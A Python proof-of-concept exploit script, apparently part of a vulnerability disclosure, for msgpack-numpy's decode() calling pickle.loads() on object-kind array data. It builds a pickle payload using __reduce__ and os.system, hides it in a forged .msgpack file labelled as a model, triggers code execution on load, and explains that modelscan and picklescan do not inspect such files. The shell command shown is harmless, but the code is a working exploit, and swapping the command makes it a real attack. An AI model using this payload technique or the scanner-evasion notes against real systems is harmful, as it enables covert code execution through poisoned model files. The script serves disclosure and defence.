"""
msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads()

VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled
data when the serialized array has dtype kind 'O' (object). This enables
arbitrary code execution whenever a msgpack file is deserialized with the
msgpack_numpy decode hook.

The vulnerable code in msgpack_numpy.py decode():
    if b'kind' in obj and obj[b'kind'] == b'O':
        return pickle.loads(obj[b'data'])

An attacker can craft a .msgpack file in which any array field has kind='O'
and data=<malicious_pickle_payload>, achieving RCE on deserialization.

This is particularly dangerous because:
1. MessagePack is considered a "safe" serialization format
2. Users expect msgpack files to contain only data, not executable code
3. The pickle.loads() call is hidden inside the msgpack extension hooks
4. No scanner (modelscan, picklescan) checks .msgpack files

Affected: all msgpack-numpy releases up to and including 0.4.8
"""
|
import contextlib
import os
import pickle
import sys

import msgpack
import msgpack_numpy as m
import numpy as np
|
# Scratch file the payload writes to; finding it after the load step is the
# evidence that the embedded command actually ran.
MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt"

# ---------------------------------------------------------------------------
# Step 1: baseline -- a legitimate array round-trip through msgpack_numpy
# ---------------------------------------------------------------------------
print("[*] Demonstrating normal msgpack_numpy usage...")
benign_weights = np.array([1.0, 2.0, 3.0], dtype=np.float32)
benign_blob = msgpack.packb({"weights": benign_weights}, default=m.encode)
benign_roundtrip = msgpack.unpackb(benign_blob, object_hook=m.decode, raw=False)
print(f"[+] Normal round-trip: {benign_roundtrip}")
|
# ---------------------------------------------------------------------------
# Step 2: build the pickle payload that decode() will end up unpickling
# ---------------------------------------------------------------------------
print("\n[*] Creating malicious msgpack payload...")


class MaliciousPayload:
    """Proof-of-concept object whose unpickling runs a harmless shell command.

    pickle consults ``__reduce__`` when serializing; the ``(callable, args)``
    pair it returns is stored in the stream, and ``pickle.loads`` later calls
    ``callable(*args)``. Here that call only writes the output of ``id`` and
    one marker line into ``MARKER_FILE``.
    """

    def __reduce__(self):
        marker_note = "RCE via msgpack_numpy hidden pickle.loads"
        shell_line = f"id > {MARKER_FILE} && echo '{marker_note}' >> {MARKER_FILE}"
        return os.system, (shell_line,)


malicious_pickle = pickle.dumps(MaliciousPayload())
|
# ---------------------------------------------------------------------------
# Step 3: wrap the payload in a forged array record and write it to disk
# ---------------------------------------------------------------------------
malicious_path = "/tmp/malicious_model.msgpack"

# b'kind' == b'O' is the condition that sends decode() to
# pickle.loads(obj[b'data']); the keys are bytes because decode() looks them
# up as bytes.
malicious_array = {
    b'nd': True,
    b'kind': b'O',
    b'data': malicious_pickle,
    b'shape': (1,),
    b'type': b'O',
}

# Surround the forged record with ordinary-looking metadata fields.
model_data = dict(
    model_name="safe-looking-model",
    version="1.0.0",
    weights=malicious_array,
)

packed = msgpack.packb(model_data, use_bin_type=True)
with open(malicious_path, 'wb') as out_file:
    out_file.write(packed)

print(f"[+] Malicious msgpack file saved to {malicious_path}")
print(f" File size: {len(packed)} bytes")
|
# ---------------------------------------------------------------------------
# Step 4: clear any stale marker so a later hit can only come from this run
# ---------------------------------------------------------------------------
# EAFP: remove the file directly and ignore "already absent". Checking
# os.path.exists() first leaves a window between the check and the removal,
# and it also skips a dangling symlink left at this path.
with contextlib.suppress(FileNotFoundError):
    os.remove(MARKER_FILE)
|
# ---------------------------------------------------------------------------
# Step 5: load the file the way a victim application would
# ---------------------------------------------------------------------------
# WARNING: decoding this file unpickles the embedded payload and runs its
# shell command. Execute only in a disposable, isolated environment.
print("\n[*] Loading malicious msgpack with msgpack_numpy decoder...")
with open(malicious_path, 'rb') as model_file:
    raw_bytes = model_file.read()
    loaded = msgpack.unpackb(raw_bytes, object_hook=m.decode, raw=False)

# Report the top-level keys when a mapping came back, otherwise just the type.
if isinstance(loaded, dict):
    loaded_summary = list(loaded.keys())
else:
    loaded_summary = type(loaded)
print(f"[+] Loaded data keys: {loaded_summary}")
|
# ---------------------------------------------------------------------------
# Step 6: check whether the payload left its marker behind
# ---------------------------------------------------------------------------
# Guard clause: no marker means the command never ran, so exit non-zero.
if not os.path.exists(MARKER_FILE):
    print("\n[-] RCE marker file not found")
    sys.exit(1)

with open(MARKER_FILE) as marker:
    marker_text = marker.read().strip()
print("\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED")
print(f"[!!!] Marker file contents:\n{marker_text}")
# Remove the marker so a later run starts from a clean state.
os.remove(MARKER_FILE)
|
# ---------------------------------------------------------------------------
# Step 7: explain why existing model scanners do not flag the file
# ---------------------------------------------------------------------------
evasion_rule = "=" * 60
# One print with sep="\n" emits the same three lines as three separate prints.
print("\n" + evasion_rule, "SCANNER EVASION", evasion_rule, sep="\n")
print("""
Neither modelscan nor picklescan scan .msgpack files at all.

modelscan -p /tmp/malicious_model.msgpack
# -> Skips file (unsupported format)

picklescan -p /tmp/malicious_model.msgpack
# -> Scanned files: 0, Infected files: 0

The pickle payload is embedded inside a msgpack structure,
completely invisible to all current model security scanners.
""")
|
# Final recap of the finding, printed under a banner.
summary_rule = "=" * 60
print(summary_rule, "VULNERABILITY SUMMARY", summary_rule, sep="\n")

# Use the installed package's version when it exposes one; otherwise fall
# back to the release this report was written against.
detected_version = getattr(m, '__version__', '0.4.8')
print(f"""
Library: msgpack-numpy {detected_version}
File: msgpack_numpy.py, decode() function
Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O'
Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode
Attack: Set array kind='O' and data=<malicious_pickle_bytes>
Impact: Arbitrary code execution on file load
Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned)
picklescan - NOT APPLICABLE (.msgpack not scanned)

Real-world usage: msgpack-numpy is used for ML data serialization,
feature embeddings, and intermediate model storage. Any application
loading untrusted .msgpack files with msgpack_numpy is vulnerable.
""")
|